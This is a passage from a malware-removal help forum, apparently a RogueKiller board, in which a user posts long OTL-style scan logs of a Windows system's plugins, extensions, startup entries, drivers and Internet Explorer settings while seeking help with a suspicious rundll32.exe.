CHR - plugin: Wolfram Mathematica (Enabled) = C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files (x86)\Microsoft Silverlight\5.1.10516.0\npctrl.dll
CHR - plugin: Java(TM) Platform SE 7 U5 (Enabled) = C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
CHR - plugin: Windows Activation Technologies (Enabled) = C:\Windows\system32\Wat\npWatWeb.dll
CHR - plugin: iTunes Application Detector (Enabled) = E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajjloplcjllkammemhenacfjcccockde\1.2.9_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcdabfmndggphffkchfdcekcokmbnkjl\1.7_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\blelaljgakacjdeaggpjilljobdmboff\2.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.10_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba\1.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.5.4_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog\1.4.2.6_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljmpblpndedodbmceeghpahabeppemed\0.4_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nejdjlaibiicicciokonbbkecjleilon\1.6.3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih\2.0.6_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg\7.2.1_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolicfpkpnpbaonkibdjkpbchakfdmig\0.93_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pemhgklkefakciniebenbfclihhmmfcd\3.3.9_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgeolalilifpodheeocdmbhehgnkkbak\0.2.94_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
 
O1 HOSTS File: ([2015/01/20 23:10:57 | 000,000,822 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1             localhost
O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Adblock Plus for IE Browser Helper Object) - {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
O2 - BHO: (Microsoft Web Test Recorder 12.0 Helper) - {432dd630-7e03-4c97-9d62-b99f52df4fc2} - E:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Kernel and Hardware Abstraction Layer] C:\Windows\KHALMNPR.Exe (Logitech, Inc.)
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [JMB36X IDE Setup] C:\Windows\RaidTool\xInsIDE.exe ()
O4 - HKLM..\Run: [Logitech G35] C:\Program Files (x86)\Logitech\G35\G35.exe (Logitech(c))
O4 - HKU\S-1-5-19..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-20..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun File not found
O4 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000..\Run: [F.lux] C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe (Flux Software LLC)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000..\RunOnce: [Adobe Speed Launcher] 1422035204 File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8:64bit: - Extra context menu item: E&xport to Microsoft Excel - E:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: E&xport to Microsoft Excel - E:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([asa1] https in Trusted sites)
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([cad] https in Trusted sites)
O15 - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..Trusted Domains: njit.edu ([webvpn] https in Trusted sites)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 10.71.2)
O16 - DPF: {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 1.7.0_51)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab (Java Plug-in 10.71.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F450D213-6B32-4A98-B391-92E436671A03}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}\Shell - "" = AutoRun
O33 - MountPoints2\{4e3c6581-3e0c-11e4-a241-c86000246db4}\Shell\AutoRun\command - "" = F:\Startme.exe
O33 - MountPoints2\F\Shell - "" = AutoRun
O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\setup.exe
O33 - MountPoints2\G\Shell - "" = AutoRun
O33 - MountPoints2\G\Shell\AutoRun\command - "" = G:\bunnyust.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

5
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 23, 2015, 09:21:00 PM »
----------******************Continuing from the other post *********-----------





========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/11/18 15:02:16 | 000,084,992 | ---- | M] (Intel  Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\IntelHaxm.sys -- (IntelHaxm)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/07/14 12:09:16 | 000,013,568 | ---- | M] (Resplendence Software Projects Sp.) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rspCrash64.sys -- (rspCrash)
DRV:64bit: - [2014/03/31 11:42:44 | 000,040,392 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvvad64v.sys -- (nvvad_WaveExtensible)
DRV:64bit: - [2014/03/26 18:00:14 | 000,141,600 | ---- | M] (Oracle Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys -- (VBoxNetAdp)
DRV:64bit: - [2013/10/01 21:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/07/19 16:12:38 | 000,052,080 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpnva64-6.sys -- (vpnva)
DRV:64bit: - [2013/07/19 16:10:16 | 000,112,080 | R--- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acsock64.sys -- (acsock)
DRV:64bit: - [2013/01/22 17:08:56 | 000,004,608 | ---- | M] (RealVNC Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vncmirror.sys -- (vncmirror)
DRV:64bit: - [2012/12/13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 12:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/06/07 10:17:04 | 000,319,336 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mv91xx.sys -- (mv91xx)
DRV:64bit: - [2012/05/30 21:10:15 | 000,121,416 | ---- | M] (MotioninJoy) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MijXfilt.sys -- (MotioninJoyXFilter)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/02/09 01:06:36 | 000,125,376 | ---- | M] (Power Software Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\scdemu.sys -- (SCDEmu)
DRV:64bit: - [2011/07/20 12:58:22 | 000,044,032 | ---- | M] (Research in Motion Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RimSerial_AMD64.sys -- (RimVSerPort)
DRV:64bit: - [2011/07/20 08:37:56 | 000,342,704 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1c62x64.sys -- (e1cexpress)
DRV:64bit: - [2011/06/21 09:26:40 | 000,336,048 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1q62x64.sys -- (e1qexpress)
DRV:64bit: - [2011/04/15 10:08:26 | 012,228,128 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/01/19 17:47:18 | 000,021,992 | ---- | M] (CPUID) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\cpuz135_x64.sys -- (cpuz135)
DRV:64bit: - [2010/12/10 12:50:36 | 000,181,248 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc)
DRV:64bit: - [2010/12/10 12:50:36 | 000,080,384 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub)
DRV:64bit: - [2010/11/20 22:24:43 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2010/11/20 22:23:48 | 000,117,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tsusbhub.sys -- (tsusbhub)
DRV:64bit: - [2010/11/20 22:23:48 | 000,088,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Synth3dVsc.sys -- (Synth3dVsc)
DRV:64bit: - [2010/11/20 22:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/20 22:23:48 | 000,034,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/10/15 00:28:16 | 000,317,440 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2010/09/29 10:34:50 | 000,377,176 | ---- | M] (Logitech) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ladfSBVMamd64.sys -- (LADF_SBVM)
DRV:64bit: - [2010/09/29 10:34:48 | 000,062,168 | ---- | M] (Logitech) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ladfDHP2amd64.sys -- (LADF_DHP2)
DRV:64bit: - [2010/08/10 16:29:14 | 000,120,920 | ---- | M] (JMicron Technology Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\jraid.sys -- (JRAID)
DRV:64bit: - [2010/07/08 03:32:19 | 000,050,056 | ---- | M] (Saitek) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SaiBus.sys -- (SaiNtBus)
DRV:64bit: - [2010/07/08 03:32:19 | 000,022,792 | ---- | M] (Saitek) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SaiMini.sys -- (SaiMini)
DRV:64bit: - [2010/07/08 03:32:14 | 000,172,040 | ---- | M] (Saitek) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SaiK0836.sys -- (SaiK0836)
DRV:64bit: - [2010/02/08 07:32:00 | 000,014,992 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CVirtA64.sys -- (CVirtA)
DRV:64bit: - [2009/11/24 14:29:16 | 000,074,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb21.sys -- (xusb21)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 19:10:47 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rootmdm.sys -- (ROOTMODEM)
DRV:64bit: - [2009/07/13 19:09:10 | 000,007,680 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\loop.sys -- (msloop)
DRV:64bit: - [2009/06/17 08:54:30 | 000,057,872 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LMouFilt.Sys -- (LMouFilt)
DRV:64bit: - [2009/06/17 08:54:22 | 000,055,312 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LHidFilt.Sys -- (LHidFilt)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/25 10:48:00 | 000,153,128 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mdm.sys -- (s1018mdm)
DRV:64bit: - [2009/03/25 10:48:00 | 000,146,472 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018unic.sys -- (s1018unic)
DRV:64bit: - [2009/03/25 10:48:00 | 000,133,160 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mgmt.sys -- (s1018mgmt)
DRV:64bit: - [2009/03/25 10:48:00 | 000,128,552 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018obex.sys -- (s1018obex)
DRV:64bit: - [2009/03/25 10:48:00 | 000,113,704 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018bus.sys -- (s1018bus)
DRV:64bit: - [2009/03/25 10:48:00 | 000,034,856 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018nd5.sys -- (s1018nd5)
DRV:64bit: - [2009/03/25 10:48:00 | 000,019,496 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mdfl.sys -- (s1018mdfl)
DRV:64bit: - [2008/11/16 17:39:44 | 000,157,968 | ---- | M] (Deterministic Networks, Inc.) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\dne64x.sys -- (DNE)
DRV:64bit: - [2008/08/04 23:21:48 | 001,075,712 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WPN111vx.sys -- (WPN111)
DRV:64bit: - [2006/11/28 20:46:20 | 000,043,328 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\PCAMp50a64.sys -- (PCAMp50a64)
DRV:64bit: - [2006/11/28 20:46:20 | 000,041,280 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\PCASp50a64.sys -- (PCASp50a64)
DRV - [2014/05/19 05:46:34 | 000,013,480 | ---- | M] () [Kernel | On_Demand | Running] -- E:\Program Files (x86)\MSI Afterburner\RTCore64.sys -- (RTCore64)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.loca
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.loca
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs =
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP =
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{B2BDB263-17DB-4090-80D7-8B05E67E35D7}: "URL" = https://www.google.com/search?q={searchTerms}
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456}: "URL" = https://search.yahoo.com/yhs/search?hspart=w3i&hsimp=yhs-synd1&p={searchTerms}&type=W3i_DS,221,0_0,Search,20140727,0,0,0,7743
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 

6
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
